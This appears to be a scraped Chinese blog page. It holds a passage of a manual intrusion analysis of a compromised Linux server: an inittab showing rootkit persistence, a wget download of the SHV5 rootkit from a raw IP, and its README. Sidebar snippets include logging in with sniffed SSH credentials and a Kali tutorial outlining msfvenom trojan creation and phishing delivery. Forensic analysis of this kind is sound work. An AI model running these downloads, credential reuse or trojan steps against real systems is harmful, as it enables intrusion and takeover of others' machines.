linux肉鸡程序检查,一台linux肉鸡的简单手工入侵检测过程

最新推荐文章于 2024-04-26 19:45:32 发布
最新推荐文章于 2024-04-26 19:45:32 发布
阅读量128 收藏
点赞数
文章标签: linux肉鸡程序检查

#   6 - reboot (Do NOT set initdefault to this)

#

id:5:initdefault:

# System initialization.

si::sysinit:/etc/rc.d/rc.sysinit

l0:0:wait:/etc/rc.d/rc 0

l1:1:wait:/etc/rc.d/rc 1

l2:2:wait:/etc/rc.d/rc 2

l3:3:wait:/etc/rc.d/rc 3

l4:4:wait:/etc/rc.d/rc 4

l5:5:wait:/etc/rc.d/rc 5

l6:6:wait:/etc/rc.d/rc 6

# Trap CTRL-ALT-DELETE

ca::ctrlaltdel:/sbin/shutdown -t3 -r now

# When our UPS tells us power has failed, assume we have a few minutes

# of power left.  Schedule a shutdown for 2 minutes from now.

# This does, of course, assume you have powerd installed and your

# UPS connected and working correctly.

pf::powerfail:/sbin/shutdown -f -h +2 "Power Failure; System Shutting Down"

# If power was restored before the shutdown kicked in, cancel it.

pr:12345:powerokwait:/sbin/shutdown -c "Power Restored; Shutdown Cancelled"

# Run xdm in runlevel 5

x:5:respawn:/etc/X11/prefdm -nodaemon

# Loading standard ttys

0:2345:once:/usr/sbin/ttyload        (在这里了)

# Run gettys in standard runlevels

1:2345:respawn:/sbin/mingetty tty1

2:2345:respawn:/sbin/mingetty tty2

3:2345:respawn:/sbin/mingetty tty3

4:2345:respawn:/sbin/mingetty tty4

5:2345:respawn:/sbin/mingetty tty5

6:2345:respawn:/sbin/mingetty tty6

# modem getty.

# mo:235:respawn:/usr/sbin/mgetty -s 38400 modem

# fax getty (hylafax)

# mo:35:respawn:/usr/lib/fax/faxgetty /dev/modem

# vbox (voice box) getty

# I6:35:respawn:/usr/sbin/vboxgetty -d /dev/ttyI6

# I7:35:respawn:/usr/sbin/vboxgetty -d /dev/ttyI7

# end of /etc/inittab

看看他的启动文件:

[root@localhost lib]# cat /usr/sbin/ttyload

/sbin/ttyload -q >/dev/null 2>&1

/sbin/ttymon >/dev/null 2>&1

以上除了工具,我们通过手工的方式对rootkit进行了一些简单的分析,这个是个没有修改过的SHV5。以上只是一些思路,在对待入侵问题上要具体问题具体分析,这个相对简单了点。

下面我们测试下这个SHV5:

[root@localhost .v]# wget http://211.100.50.70/shv5.tar.gz

解压、安装:

[root@localhost .v]# tar zxf shv5.tar.gz

[root@localhost .v]# cd shv5

[root@localhost shv5]# ls

bin.tgz  conf.tgz  lib.tgz  README  setup  utilz.tgz

[root@localhost shv5]# cat README

############

### shv5 ###

############

MMMMMMM                                   MMMMMMMMMMMMMMM

MMMMMMM                                   MMMMMMMMMMMMMMM

MMMMMMM                                   MMMMMMMMMMMMMMM

MMMMMMM                                   MMMMMMMMMMMMMMM

MMMMMMM                                   MMMMMM

MMMMMM  MMMMMMMMMMMMMMMM     MMMMMMM    MMMMMMM   MMMMMM

MMMMMMMM  MMMMMMMMMMMMMMMMM    MMMMMMM    MMMMMMM   MMMMMMMMMMMM

MMMMMMMMM  MMMMMMMMMMMMMMMMMM   MMMMMMM    MMMMMMM   MMMMMMMMMMMMMM

MMMMMMMMMM  MMMMMMMMMMMMMMMMMM   MMMMMMM    MMMMMMM        MMMMMMMMMM

MMMMMMM     MMMMMMM    MMMMMMM   MMMMMMM    MMMMMMM          MMMMMMMM

MMMMMMM     MMMMMMM    MMMMMMM    MMMMMM    MMMMMM            MMMMMMMM

MMMMMMM     MMMMMMM    MMMMMMM    MMMMMMM  MMMMMMM            MMMMMMMM

MMMMMMMMMM     MMMMMMM    MMMMMMM     MMMMMMMMMMMMMM    MMM     MMMMMMMM

MMMMMMMMMMM      MMMMMMM    MMMMMMM      MMMMMMMMMMMMM    MMMMMMMMMMMMMMMM

MMMMMMMMMMM       MMMMMMM    MMMMMMM       MMMMMMMMMMM     MMMMMMMMMMMMMMM

MMMMMMMMMM        MMMMMMM    MMMMMMM        MMMMMMMMM      MMMMMMMMMMMMM

MMMMMMMM          MMMMMMM    MMMMMMM          MMMMM            MMMMMMM

DISCLAIMER:

* The purpose of these coded instructions, statements and computer

* programs is for TEST AIMS ONLY !

weixin_39786706
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
一台linux肉鸡简单手工入侵检测过程.docx
01-15
一台linux肉鸡简单手工入侵检测过程.docx
Linux服务器中木马(肉鸡手工清除方法
wuyongde0922的专栏
05-24 4885
0,简单判断有无木马 有无下列文件 cat /etc/rc.d/init.d/selinux cat /etc/rc.d/init.d/DbSecuritySpt ls /usr/bin/bsd-port  ls /usr/bin/dpkgd 查看大小是否正常 ls -lh /bin/netstat ls -lh /bin/ps ls -lh
linux肉鸡检测,一台linux肉鸡简单手工入侵检测过程
weixin_39820910的博客
05-13 113
[root@localhost ~]# netstat -lntpActive Internet connections (only servers)Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program nametcp        0      0 127.0.0.1...
Linux服务器沦陷为肉鸡的全过程实录,2024年最新2024-2024历年华为跳动软件测试面试真题解析
2401_84254196的博客
04-15 632
var/log/messages、/var/log/secure都是必不可少的分析目标,然后就是.bash_history命令记录。所以最先分析 /var/log/secure日志,看登录历史。2 vi .bash_profile (查看.bash_profile,看变量设置,把/home/oracle/bin增加到PATH)分析/var/log/secure日志。16 ls -a (查看/home/oracle/下的隐藏文件)
linux服务器被当肉鸡过程_linux 被 串改的 过程
2303_79055586的博客
04-12 957
中…(img-Q8LEFDRF-1712883805411)]
linux docker位置查找,linux – 如何在Docker中获取依赖子图像列表?(1)
2301_77118221的博客
04-26 366
本书是获得了很多读者好评的Linux经典畅销书**《Linux从入门到精通》的第2版**。您应该能够查找父ID以f50f9524513f开头的图像,然后查找这些图像的子图像等.但是.Parent isn’t what you think.,所以在大多数情况下,您需要指定docker图像 – 以上所有才能使其工作,那么你也将获得所有中间层的图像ID.需要《Linux入门到精通》、《linux系统移植》、《Linux驱动开发入门实战》、《Linux开源网络全栈》电子书籍及教程的工程师朋友们劳烦您转发+评论。
记一次入侵Linux服务器和删除木马程序的经历
01-10
晚上看到有台服务器流量跑的很高,明显和平常不一样,流量达到了800Mbps,第一感觉应该是中木马了,被人当做肉鸡了,在大量发包。 我们的服务器为了最好性能,防火墙(iptables)什么的都没有开启,但是服务器前面有...
YOLO养殖场肉鸡目标检测检测数据集
11-12
几千张YOLO养殖场肉鸡目标检测检测数据集,检测鸡的位置,yolov5、yolov7、yolov8等算法可以直接进行训练模型, 数据集和检测结果参考:https://blog.csdn.net/zhiqingAI/article/details/124230743
YOLOv3养殖场肉鸡健康状态检测权重+数据集
05-25
YOLOv3养殖场肉鸡健康状态检测权重,包含养殖场肉鸡健康状态检测数据集 ;数据集目录已经配置好,划分好 train,val, test,并附有data.yaml文件,yolov5、yolov7、yolov8,yolov9等算法可以直接进行训练模型,txt...
YOLOv10养殖场肉鸡健康状态检测权重+数据集
最新发布
06-29
YOLOv10养殖场肉鸡健康状态检测权重,包含养殖场肉鸡健康状态检测数据集 ;数据集目录已经配置好,划分好 train,val, test,并附有data.yaml文件,yolov5、yolov7、yolov8,yolov9等算法可以直接进行训练模型,txt...
linux 路由鸡,一台linux肉鸡简单手工入侵检测过程
weixin_39722025的博客
05-14 128
还好rpm没替换,看来系统的好些命令被替换了,嘿嘿,有同行在啊。不好意思,那我就要T你下去了。下面先检查一下,当然这个系统不可靠了,我们先替换回可靠的命令:[root@localhost bin]# cp -f /home/ldc/.v/dir /usr/bin/dircp: cannot remove `/usr/bin/dir': Operation not permittedchattr加了...
linux肉鸡了,某Linux服务器被变成肉鸡过程
weixin_33511258的博客
05-25 532
安装了Oracle数据库的Linux服务器,由于密码过于简单,导致被变成肉鸡。***者登录记录由Logwatch发到了管理员信箱,被管理员发现。***者的操作步骤都记录在.bash_history文件里。提醒:所有帐号口令一定要有强度,避免被猜到。一定要启用日志分析程序。启用Iptables进行安全策略部署。***者操作步骤如下:cd /var/tmpwget [url]www.bcsteel.c...
linux肉鸡教程视频,超简单的菜鸟网吧抓肉鸡教程
weixin_39731916的博客
05-03 2514
大家好!我是rockwolf,我这次给大家做的教程是超简单的菜鸟网吧抓肉鸡教程.首先,需要的工具:1.灰鸽子一个:版本任意2.WebMan:开启HTTP服务的小工具3.啊D网络工具包:这个大家应该很常用的了````不用介绍的了吧`````我的鸽子上线是在本机建立FTP服务器的,大家看我操作.首先,在本机任意目录建立一个做为FTP服务器的文件夹,我为了方便,就在F盘的根目录下建立了.打开灰鸽子,工具...
linux肉鸡入侵详细教程,一台linux肉鸡简单手工入侵检测过程
weixin_39727336的博客
05-02 857
今天发现一台肉鸡上某人的ssh连到另外一台服务器上,记录下了密码。[root@mail ~]# cat /tmp/sshpswdldc:sle823jfsGs@222.222.66.11直接ssh上去。[root@mail ~]# ssh ldc@222.222.66.11ldc@222.222.66.11's password:Last login: Fri Jul 17 13:11:38 20...
linux服务器被当肉鸡过程
Ryze的博客
06-17 9875
肉鸡,暴力破解入侵。
Linux服务器沦陷为肉鸡的全过程实录
热门推荐
smstong的成长轨迹
03-18 2万+
Linux服务器沦陷为肉鸡的全过程实录Linux服务器沦陷为肉鸡的全过程实录 从防火墙瘫痪说起 查找黑客行踪的方法 沦陷过程分析 1 oracle用户密码被破解 2 黑客动作推演 3 攻击工具一览 深刻教训1 从防火墙瘫痪说起2015年3月10日,还没到公司就被电话告知办公室无法正常连接互联网了,网速非常慢,无法正常浏览网页。急急忙忙感到公司,开始查找问题。首先排除了交换机故障,因为内部局域网正常。
一次被入侵和删除木马程序的经历(转)
极客海哥
11-21 3384
首先剧透一下后门木马如下: (当然这是事后平静下来后慢慢搜出来的,那个时候喝着咖啡感觉像个自由人) 木马名称 Linux.BackDoor.Gates.5 http://forum.antichat.ru/threads/413337/ 首先是下午14点左右有几台服务器出现流量超高,平时只有几百M的流量,那时候发现流量上G了,达到这个量第一感觉就是遭受了DDOS流量攻击
kali linux肉鸡教程
10-27
Kali Linux肉鸡教程是一种网络安全攻击技术,旨在通过社会工程学攻击和漏洞利用技术获取远程计算机的控制权。以下是一些步骤: 1. 扫描目标网络,找到易受攻击的计算机。 2. 利用漏洞或社会工程学攻击技术,将木马程序安装到目标计算机上。 3. 在Kali Linux中使用msfconsole工具,设置监听器,等待目标计算机连接。 4. 一旦目标计算机连接到监听器,攻击者就可以获得对该计算机的控制权,并执行各种操作,例如窃取敏感信息、安装其他恶意软件等。 具体来说,以下是一些可能的步骤: 1. 扫描目标网络,找到易受攻击的计算机。 2. 利用社会工程学攻击技术,向目标计算机发送诱骗邮件或信息,诱导用户点击恶意链接或下载恶意文件。 3. 一旦用户点击链接或下载文件,木马程序就会被安装到目标计算机上。 4. 在Kali Linux中,使用msfvenom工具生成木马程序,并将其命名为evilshell.exe。 5. 将生成的木马文件拷贝到/var/www/html目录下,并开启apache服务。 6. 在肉鸡上打开浏览器,访问该站点(Kali的IP),下载木马文件。 7. 一旦用户运行木马程序,攻击者就可以获得对该计算机的控制权,并执行各种操作。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值